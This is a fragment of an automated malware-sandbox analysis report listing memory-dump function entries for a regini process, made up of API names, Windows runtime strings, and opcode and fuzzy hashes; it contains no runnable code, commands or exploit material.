                                                                                  • Instruction ID: ee695c9d822f13d900e9ae5183529eefb4eb13bf181944a1232efa5c72160343
                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction Fuzzy Hash: 95022671548341AFC709DF18D490A6FBBEAEFC9704F04992DF9894B264DB31E905CB92
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: 9e674b193383a435f2229079432360430e6a98b784cd057ee353bacd58c3293f
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: 6E818E74E05249DEDF268E68C8A17EEBBA2AF45318F18415BDC93AB790C7349C40CB61
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: 5b0c0d7147783336c8aaa390c41aaa848c89ffafbc3444ea05018ec1488a742a
                                                                                  • Instruction ID: 854b5074efc422949a3988a95b4b4dce4e6eee094b76107a7f5694d583108d34
                                                                                  • Opcode Fuzzy Hash: 5b0c0d7147783336c8aaa390c41aaa848c89ffafbc3444ea05018ec1488a742a
                                                                                  • Instruction Fuzzy Hash: 81218176A00129ABDB10DF79DC54EFEBBE9EF44748F04412AEE06E3200E73099058BB0
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02DE02BD
                                                                                  • RTL: Re-Waiting, xrefs: 02DE031E
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02DE02E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: c5e6fb238a187a4283790187ed94eafd8bde66a8be613d4601295a614ebf1d80
                                                                                  • Instruction ID: 6df724197e3dc11a8081328621912b1bb51fdf12ce980094f9c8e539822c396f
                                                                                  • Opcode Fuzzy Hash: c5e6fb238a187a4283790187ed94eafd8bde66a8be613d4601295a614ebf1d80
                                                                                  • Instruction Fuzzy Hash: BCE1BA306087419FDB25DF28C884B2AB7E1EB84328F144A69F5A6DB7E0D7B5DC44CB52
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 02DE7BAC
                                                                                  • RTL: Resource at %p, xrefs: 02DE7B8E
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02DE7B7F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: 01bb3a7e92157ea2c7e1b06363435a689f386878e22106c3cd740096e6573a54
                                                                                  • Instruction ID: 856b5d576b62fbc9df1270be725008b0ee3ccccd955c523789a0b051825db4d1
                                                                                  • Opcode Fuzzy Hash: 01bb3a7e92157ea2c7e1b06363435a689f386878e22106c3cd740096e6573a54
                                                                                  • Instruction Fuzzy Hash: 0541BF317047029FDB20DE258850F6AB7E5EF98714F140A1EE996DB780DB71ED06CB91
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DE728C
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 02DE72C1
                                                                                  • RTL: Resource at %p, xrefs: 02DE72A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02DE7294
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: b09f744ba792c50c7e4b06a6d7ca342682bf18327ed14fea46daeb5009aad2d6
                                                                                  • Instruction ID: 06e4e0b19c85fb6ab97c055e9c0ee5fc02b86f5f103f8564535159e2d6b1e80b
                                                                                  • Opcode Fuzzy Hash: b09f744ba792c50c7e4b06a6d7ca342682bf18327ed14fea46daeb5009aad2d6
                                                                                  • Instruction Fuzzy Hash: CB41E331700202ABEB21DE25CC41F66B7A5FF54718F104619F996DB380DB61EC46DBE1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: e3070000a7d546318fed43d99404a6513f10d23fadb19e10823c5c72697ca0b0
                                                                                  • Instruction ID: d9f348a9c8a9347c422e72a830d998727055c2c7c320ead128cdb24db0b3afec
                                                                                  • Opcode Fuzzy Hash: e3070000a7d546318fed43d99404a6513f10d23fadb19e10823c5c72697ca0b0
                                                                                  • Instruction Fuzzy Hash: 3C31B872A002299FDB20DE28CD50BEE77F8EF44714F445455ED4AE3200EB309A488F60
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: ed9ceeb4faa41433a514d93a05f7be91a880419cfd4d04cf4fb5a2b0caab7ae7
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: A3918372E00206DBEB26DE69C8A46FEF7A5AF88764F54451AE856EB3C0D7308D40CB54
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: de581275d6546365c7102e036a779ecf98b0a506814f6cae5fb3d1c214d7527f
                                                                                  • Instruction ID: 3b4acb65b6a823b55c8cab803fafbedd0fd99da0c9414505f16192106dc7d7cd
                                                                                  • Opcode Fuzzy Hash: de581275d6546365c7102e036a779ecf98b0a506814f6cae5fb3d1c214d7527f
                                                                                  • Instruction Fuzzy Hash: 31812C76D002699BDB31DB54CC54BEEB7B8AB08754F0041DAEA19B7350E7349E84CFA0